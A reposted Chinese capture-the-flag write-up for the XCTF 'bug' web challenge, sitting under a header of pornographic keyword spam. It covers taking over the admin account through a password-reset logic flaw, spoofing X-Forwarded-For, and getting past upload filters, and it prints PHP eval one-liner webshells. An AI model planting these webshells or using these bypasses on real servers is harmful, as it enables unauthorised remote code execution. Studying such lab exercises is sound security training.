日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

XCTF-高手进阶区:bug

發(fā)布時間:2023/12/31 编程问答 31 豆豆
生活随笔 收集整理的這篇文章主要介紹了 XCTF-高手进阶区:bug 小編覺得挺不錯的,現(xiàn)在分享給大家,幫大家做個參考.

題目:

進去后發(fā)現(xiàn)如下所示:

我注冊了一個peak賬號,登錄后顯示如下:

經(jīng)過一番測試,發(fā)現(xiàn)Manage需要admin權(quán)限:

如何獲取admin權(quán)限呢?利用修改密碼界面的邏輯漏洞,修改admin的密碼,如下:

再次點擊Manage會出現(xiàn)

我們使用XFF繞過IP限制
X-Forwarded-For:簡稱XFF頭,它代表客戶端,也就是HTTP的請求端真實的IP

<!--index.php?module=filemanage&do=???--> 這個明顯是讓我們猜,這里最后根據(jù)前面filemanage(文件管理),猜到upload(上傳)


嘗試上傳一個peak.php文件:<?php @eval($_REQUEST[peak]);?>

發(fā)現(xiàn)無法上傳,被判斷為php文件,通過在上傳時可以抓包,可以發(fā)現(xiàn)是后端驗證,嘗試00截斷:

再猜測可能是過濾代碼中的特殊字符,例如?,那我們將peak.php內(nèi)容修改為:<script language="php">@eval($_REQUEST[peak])</script>,再次上傳,00截斷也不ok,依舊未果,還能咋辦?
最后發(fā)現(xiàn)php4和php5可以上傳但返回不是圖像…好!那我們就修改MIME

修改文件名為peak.jpg,結(jié)果不行!那就是peak.php的內(nèi)容有問題,目標服務(wù)器有過濾,那我們繼續(xù)使用<script language="php">@eval($_REQUEST[peak])</script>來繞過,得到flag


注:經(jīng)測試
(1)如果你的peak.php5文件內(nèi)容中沒有任何php內(nèi)容還不行,例:

(2)文件必須能被php解析執(zhí)行

總結(jié):這題主要考查

  • 對邏輯漏洞的認識
  • 對敏感目錄的猜測
  • 文件上傳的繞過(需要注意的是,有時候常用的一句話木馬,有可能會被過濾!)
  • 繞過要求:MIME類型是圖片;文件名能被php解析執(zhí)行;文件內(nèi)容既要是php文件,而且你php文件中的內(nèi)容還不能這么明顯,難搞哦

總結(jié)

以上是生活随笔為你收集整理的XCTF-高手进阶区:bug的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯,歡迎將生活随笔推薦給好友。